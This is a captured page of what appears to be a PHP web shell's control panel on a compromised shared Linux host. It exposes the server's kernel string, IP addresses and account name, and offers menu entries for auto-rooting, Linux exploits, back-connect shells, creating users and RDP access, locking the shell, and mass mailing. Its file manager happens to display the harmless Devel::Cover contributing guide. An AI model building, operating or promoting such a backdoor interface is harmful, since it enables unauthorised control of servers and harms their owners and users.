Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libdevel-cover-perl /
[ HOME SHELL ]
Name
Size
Permission
Action
BUGS
837
B
-rw-r--r--
CONTRIBUTING.md
2.02
KB
-rw-r--r--
TODO
2.71
KB
-rw-r--r--
changelog.Debian.gz
1.35
KB
-rw-r--r--
copyright
1.29
KB
-rw-r--r--
cpancover.md.gz
2.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTING.md
How to Contribute to Devel::Cover --------------------------------- Source Code ----------- The source code can be found at https://github.com/pjcj/Devel--Cover Github is the main repository and the location to file bug reports and send pull requests. There are still some old bug reports in RT which are described in https://github.com/pjcj/Devel--Cover/issues/35 I welcome all contributions, be they in the form of code, bug reports, suggestions, documentation, discussion or anything else. In general, and as with most open source projects, it is wise to dicuss any large changes before starting on implementation. HTML report generation ---------------------- Devel::Cover::Web contains a number of static files that are saved when a report is generated: cover.css common.js css.js standardista-table-sorting.js Report formats are: html|html_minimal (default) html_basic html_subtle They are implemented in: Devel::Cover::Report::Html is just a subclass of Devel::Cover::Report::Html_minimal Devel::Cover::Report::Html_basic Devel::Cover::Report::Html_subtle exists, but is probably not used by anyone. *Minimal* was written by Michael Carman. One of the goals was to keep the output as small as possible and he decided not to use templates. Unfortunately, minimal does not handle uncovered code correctly and, whilst the truth tables are nice, they are not always correct when there are many variables. This is currently the default. *Basic* handles uncovered code correctly and the conditions are displayed correctly, if not as nicely as in minimal. It also allows for coloured code. How to run Devel::Cover from Git -------------------------------- cd some_dir/ perl -I/home/foobar/work/Devel--Cover/lib/ /home/foobar/work/Devel--Cover/bin/cover --test -report html_basic CPAN Cover ---------- http://cpancover.com/ Devel::Cover::Collection is used by bin/cpancover and has some templates in it. In order to run cpancover a few extra modules are needed: Template and Parallel::Iterator
Close